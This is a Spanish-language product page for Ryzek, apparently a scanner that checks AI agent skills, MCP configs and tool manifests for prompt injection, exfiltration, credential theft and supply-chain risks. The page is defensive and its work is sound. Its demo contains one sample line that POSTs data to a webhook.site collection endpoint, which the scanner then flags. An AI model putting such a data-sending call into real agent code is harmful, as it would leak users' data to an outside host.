Escaneo de seguridad para agentes de IA
Descubre qué hace un skill antes de que tu agente lo ejecute.
Ryzek lee skills, configuraciones de servidores MCP y manifiestos de herramientas, y detecta inyección de prompts, instrucciones ocultas, robo de credenciales, permisos demasiado amplios y herramientas que cambiaron después de que las aprobaste. Cada hallazgo viene con una puntuación de confianza y el motivo detrás de ella.
Plan gratuito: 20 escaneos al mes con todas las reglas incluidas. Los archivos escaneados se leen en memoria y nunca se almacenan.
const ENDPOINT = "https://webhook.site/0000-demo"; await fetch(ENDPOINT, { method: "POST", body: JSON.stringify(notes),});
Ryzek encontró 1 problema
Contains a hardcoded request-collection endpoint. These services exist to capture arbitrary inbound requests and are not used by production software.
webhook.site
Resultado real del escáner, generado al compilar esta página.
El tráiler
Ryzek en ochenta segundos.
Lo que se les entrega a los agentes en silencio, y lo que Ryzek te muestra antes de que lo ejecuten.
Cómo funciona
De la subida a un veredicto sobre el que puedes actuar.
Sin instalación. Inicia sesión, añade tus archivos, lee lo que Ryzek encontró y por qué.
-
01 · Iniciar sesión
Crea una cuenta gratis
Inicia sesión con una cuenta que ya tengas. Tu cupo de escaneos y tu historial de herramientas te siguen a cualquier dispositivo.
-
02 · Añadir archivos
Añade lo que tu agente carga
Carpetas de skills con sus scripts, configuraciones MCP, manifiestos de herramientas,
package.jsonorequirements.txt. -
03 · Leer
Obtén un motivo, no solo una alerta
Cada hallazgo muestra su gravedad, qué tan seguro está Ryzek, por qué, el texto exacto que lo activó y su categoría OWASP.
-
04 · Reescanear
Entérate cuando una herramienta cambia
Ryzek guarda una huella de cada herramienta, no el archivo, para que un escaneo posterior pueda decirte si algo que aprobaste ha cambiado.
Qué detecta
54 reglas repartidas en cinco tipos de riesgo.
Cada regla tiene una demostración en vivo en la página de reglas: el archivo, la parte que importa y lo que el escáner realmente reporta.
18 reglas · Seguridad del agente
Texto dirigido a la IA
Inyección de prompts, instrucciones ocultas en comentarios o caracteres invisibles, resultados de herramientas falsificados y envenenamiento de memoria.
5 reglas · Exfiltración
Rutas de salida para tus datos
Endpoints de recolección, túneles DNS, balizas en imágenes y herramientas que combinan lecturas privadas con escrituras públicas.
7 reglas · Credenciales
Secretos en el lugar equivocado
Claves codificadas directamente, tokens en configuraciones MCP, lecturas de almacenes de credenciales e historial de shell, y solicitudes a metadatos de la nube.
13 reglas · Cadena de suministro
De dónde vino el código
Servidores sin fijar o suplantados, versiones con vulnerabilidades conocidas, hooks de instalación, servidores ocultos y herramientas que cambiaron después de ser aprobadas.
11 reglas · Ejecución
Más poder del que la tarea necesita
Permisos demasiado amplios, herramientas aprobadas automáticamente, escapes de sandbox, persistencia e inyección de comandos.
Todas las reglas
Ver todas las demostraciones →
Filtra por riesgo, lee la versión en lenguaje claro y consulta el resultado real de cada regla.
Por qué Ryzek
Hallazgos que puedes comprobar, de un escáner que dice dónde se detiene.
Un escáner que da falsas alarmas termina ignorado, y uno que exagera termina generando una confianza que no merece. Ryzek está diseñado para evitar ambos problemas.
Lee lo que Ryzek no puede ver, incluido el comportamiento que solo aparece mientras un servidor está en ejecución, y lo que hay dentro de los programas compilados.
- Un motivo explícito en cada hallazgo. Qué tan segura está la regla, y por qué, para que una señal de baja confianza no se lea como un ataque confirmado.
- Detección de cambios. Una herramienta que cambia en silencio después de que la aprobaste se marca en tu siguiente escaneo.
- Tus archivos no se conservan. Lo que subes se escanea en memoria y se descarta. Guardamos el recuento de escaneos y las huellas de las herramientas, nunca el contenido.
- Vinculado a OWASP. Cada regla corresponde a una categoría del OWASP MCP Top 10.
- Todas las reglas en todos los planes. Los planes de pago añadirán volumen y automatización, no detección.
Precios
Empieza gratis. Todas las reglas incluidas.
El plan gratuito ejecuta el conjunto completo de reglas, con un límite de volumen. Pronto abrirán planes de pago con límites más altos.
Disponible ahora
Free — $0
20 escaneos al mes, las 54 reglas, detección de cambios e informes descargables.
Próximamente
Pro, Pro Plus y Teams
Desde $16 al mes, con entre 300 y 1500 escaneos mensuales. Consulta qué incluyen y pide que te avisemos cuando abran.
Preguntas
Preguntas frecuentes.
¿Conservan los archivos que escaneo?
No. Los archivos se envían al escáner por HTTPS, se escanean en memoria y se descartan cuando llega el resultado. Lo que guardamos es cuántos escaneos has usado y una huella de cada herramienta (hashes más sus etiquetas de permisos) para poder avisarte si cambia. La política de privacidad tiene el detalle.
¿Por qué necesito una cuenta?
Así, tu cupo de escaneos y tu historial de herramientas van donde tú vayas. La detección de cambios solo funciona si Ryzek recuerda cómo era una herramienta la última vez que la escaneaste.
¿Qué archivos puedo escanear?
Carpetas de skills (un SKILL.md junto con los scripts que lo acompañan), archivos de configuración MCP como .mcp.json o claude_desktop_config.json, manifiestos de herramientas en JSON, y package.json o requirements.txt para hooks de instalación y dependencias vulnerables.
¿Un resultado limpio significa que un skill es seguro?
No: significa que ninguna de las 54 reglas coincidió. Ryzek lee archivos; no los ejecuta, así que el comportamiento que solo aparece en tiempo de ejecución, o dentro de un programa compilado, queda fuera de lo que puede ver. Un escaneo limpio es una buena señal, no una garantía.
¿Puedo ejecutarlo en CI?
Todavía no. La integración con CI está prevista para los planes de pago. Si te importa, cuéntanoslo: nos ayuda a decidir qué llega primero.
Escanea los skills en los que tu agente ya confía.
Registrarte y añadir tus primeros archivos toma un minuto.